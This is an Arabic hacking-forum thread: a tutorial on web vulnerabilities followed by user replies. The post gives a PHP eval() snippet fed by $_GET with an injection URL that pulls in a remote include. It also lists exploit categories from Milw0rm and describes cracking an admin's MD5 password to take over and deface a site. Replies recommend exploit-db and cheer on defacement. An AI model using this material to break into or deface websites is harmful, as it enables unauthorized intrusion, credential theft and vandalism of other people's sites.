درسنا هو عباره عن الثغرات؟ماهي الثغرات؟ماهي انواعها؟من اين نحصل عليها؟ بسم الله نبدأ. ماهي الثغرات:- هي داله او دوال تمكنك من استخدامها بطرق غير شرعيه, و ذلك اما بادراج اكواد, او اضافه رابط, او استعلام عن اوامر القاعده او تطبيق اوامر مباشره, و الهدف كله يصب في معرفه معلومات و باسوردات و خفايا موقعك التي لا تمكن الشخص العادي من معرفتها, وطبعا تختلف مدى خطوره الثغرات من ثغره الى اخرى, الان عرفنا تقريبا ما هي الثغرات و من ماذا تمكنا اذا وجدناها. سؤال: ما هو سبب حدوث هذه الاخطاء..!! السبب: يكمن بخطأ مبرمج و ذلك بترك مجال لعمليه مفتوحه المصدر دون ان يغلقها, مثال : <? $mos = $_GET['mos']; eval($mos); ?> يعني: لو فرضنا انه المبرمج هنا ترك ملف mos = مفتوح ((طبعا الملف وقت الطلب يحضر لك الملف المربوط معه و هو mos)) لو فرضنا انه تركه مفتوح دون اغلاقه و الواضح بعلامه $_GET انت وقتها تستطيع ان تدرج ملف او رابط اخر من خارج الموقع او السيرفر,و هذا ما يسمى بثغرات الفايل انكلود,وهي ثغرات تسمح لك بادراج ملف باكدور للاتصال بالسيرفر واختراقه. طريقه الاستغلال : eval.php?mos=include($include);&include=http://www.google.com eval.php = إسم الملف mos = هذي المتغير إلي يستقبل أكواد من الخارج include = داله إستدعاء ملف $include = المتغير المراد إستدعائه الان عرفنا ماهي الثغرات,وشرح مبسط عن كيفيه الاستغلال, نأتي للقسم الثاني من الدرس الي هو ماهي انواع الثغرات ومن اين نحصل عيها. الان انته تيجي تسأل سؤال من اين احصل عل الثغرات..!! تستطيع الحصول على اخر الثغرات من مواقع السيكيوريتي,وافضل موقع يقدم هذه الثغرات اللي هو موقع www.Milw0rm.com الان نأتي لانواع الثغرات اللي تنزل بالموقع. نبدأ بشرح انواع الثغرات, نجي لأول نوع من ثغرات.. ثغرات الريموت: ReMoTe هذه الثغرات تعتبر من اقوى انواع الثغرات,ومعناها التحكم عن بعد,يعني تتحكم في السيرفر من بعد شرط ان الثغره يجب ان تعمل وان لا تكون مرقعه,وأن يكون البرنامج المصاب بالثغره مركب على السيرفر, يعني مثلا فحصنا السيرفر من الثغرات وطلع فيه برنامج يشتغل على بورت معين ومصاب بالثغره, تجد الثغرات في هذا القسم,وطبها هذا الاختراق المتقدم والمستهدف. النوع الثاني من الثغرات ثغرات اللوكل: LoCaL هذه الثغرات نفس ثغرات النوع الاول,ولكن تختلف عنها بشكل خفيف,وهذه الثغرات تنزل غير مترجمه وتكون مكتوبه بلغه السي,وهذه الثغرات خاصه ايضا بالبرامج والثغره قويه بس اخف من الريموت بشوي, النوع الثالث من الثغرات..ثغرات الويب: W e b Apps هذه ثغرات سكريبتات المواقع,يعني السكربتات اللي بتكون مركبه على المواقع او السيرفر, مثل سكريبتات الصور وسكريبتات التحميل..آلخ.واي ثغره بتكتشف بتنزل في هذا القسم مع الاستغلال, وثغرات السكريبتات انواع مثل ماشرحنا فوق,مثل ثغرات الفايل انكلود وثغرات الـSQL والكوماند, واستغلالها يكون سهل.سنتطرق اليه في مواضيع ثانيه. النوع الرابع من الثغرات: dos / poc هذه الثغرات غير قويه وقليل ما تزبط معك,ماتقدر تسوي شيء فيها الا عمل كراش وتعليق للسيرفر, يعني ماتقدر تلعب بالمواقع اللي على السيرفر, ولا تحط اندكس ولا شيء بس تعلق السيرفر , يعني مافيها فايده الا التعليق وعمل كراش, النوع الخامس من الثغرات: S h e l l Code هذه الثغرات هي عباره عن كود برمجي ي تحقنه في الموقع من خلال الشل او غير يخليك تتصل عكسي او يضيف يوزر جديد..آلخ,ابس لازم يكون البرنامج مركب في السيرفر. القسم السادس من الـMilw0rm papers هذه زي الكتب بس غالبا او دائما ماتلقى كتاب عربي. القسم السابع وهو قسم الفيديوهات: Videos هذا القسم ينزل في شروحات فيديو للثغرات,لكن ما فيه عربي. نيجي لقسم اخر وهو قسم مهم في الـMilw0rm اللي هو فك تشفير الباسوردات,مثلا جبت ثغره واستغليتها وطلع لك اسم الادمن والباسورد مشفر وغالبا الباسورد ما يكون مشفر بمقياس Md5 في نفس الموقع تستطيع فك تشفير الباسورد,واختراق الموقع بدخول الى لوحه التحكم الرئيسيه وتعليق الاندكس الخاص بك. نشرح كيف نفك الباسورد: نذهب الى كلمه Cracker ثم نذهب الى insert ثم نملأ البيانات انتهى الشرح بحمد الله,
الله يعطيك العفية بس موقع ميلورم ما شغال ليش يا ترى ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟
كن في الحياة كعابر سبيل ... واترك ورائك كل اثر جميل... فما نحن في الحياة الا ضيوف ... وما على الضيوف الا الرحيل ! شباب انا دخولي بل نت قليل لانو عم سافر بل بحر .......... دعولي
شكرا اخي الكريم على المجهود الرائع بس متل ماقال الاخ sahrawi7 موقع ميلورم مو شغال يسلموا يا غالي
مشكووووور وانا زكم مو شغال عندي اظن لان الانترنت ضعيف
شرح كافي ووافي وتسلم يمينك عالشرح الجميل مشكور الله يعطيك العافية اما بالنسبة للميلورم فهو بحكم المغلق لا لأن النت ضعيف يوجد بديل والكثير من مواقع السيكيورتي
مشكوووور والله يعطيك ألف عافية
[IMG]http://www7.0zz0.com/2010/09/10/01/873378380.gif[/IMG] [IMG]http://www3.0zz0.com/2010/09/10/01/956300772.jpg[/IMG] Will Be BaCK Soon
اخي مشكور على المجهود لكن الشرح منقول وقديم اليك موقع الثغراث الجديد www.exploit-db.com نحن في انتظار اندكسك
اللهم صلي على الحبيب
المشاركة الأصلية كتبت بواسطة kadirofe اخي مشكور على المجهود لكن الشرح منقول وقديم اليك موقع الثغراث الجديد www.exploit-db.com نحن في انتظار اندكسك أوافقك الرأي 100% الشرح قديم ومنقول وشكرا .... بس على كل حال ما منرد حد خايب يعطيك ألف عافية وشكرا >>>>
خخخخخخخخخخ الموقع له فتره كبيره مغلق خخخخخ يغلق!
فيديو اليوم اللهم صلي على سيدنا محمد ، على عَدد خَلقِك وَعلى قدر عَظَمَتك وعلى قَدرٍ محبتك له . سجل إختراقك الأن في Aljyyosh.org بمميزات عديده من مواضيعي: 1 - عمل ايميل ياهو - ياهو 2 - عمل ايميل - انشاء ايميل 3 - كيف اسوي ايميل - انشاء ايميل 4 - تحميل الياهو 5 - برامج حماية 6 - دورة اختراق المواقع 7 - فتح المواقع المحجوبة 8 - لعبة فيفا 2012 9 - لعبة كاونتر سترايك 10 - لعبة GTA San Andreas 11 - استعادة الملفات 12 - فك الضغط 11 - لعبة صلاح الدين 12 - لعبة فاي ستي 13 - لعبة pes 2012 14 - عمل فيس بوك - فيس بوك 15 - فوتو فونيا - photofunia 2012 16 - برنامج تشارلز - برنامج Charles 17 - تحميل برنامج داون لود مانجر 18 - برنامج Internet Download Manager 19 - تحميل انترنت اكسبلورر 20 - لعبة جاتا - تحميل لعبة جاتا - لعبة gta 21 - لعبة نيد فور سبيد - لعبة need for speed 22 - لعبة كراش - لعبة crash 23 - لعبة ماين كرافت - لعبة MineCraft 24 - برامج - تحميل برامج - تحميل العاب 25 - تحميل برنامج محول الصوتيات 26 - برنامج تركيب الصور 27 - كراك idm 28 - تحميل كاسبر سكاي 29 - تحميل ماسنجر بلس 30 - برنامج تسريع النت سُبْحَانَكَ اللَّهُمَّ وبَحَمْدكَ أشْهدُ أنْ لا إلهَ إلا أنْتَ أَسْتَغْفِرُكَ وأتُوبُ إِلَيْكَ
قوانين المنتدى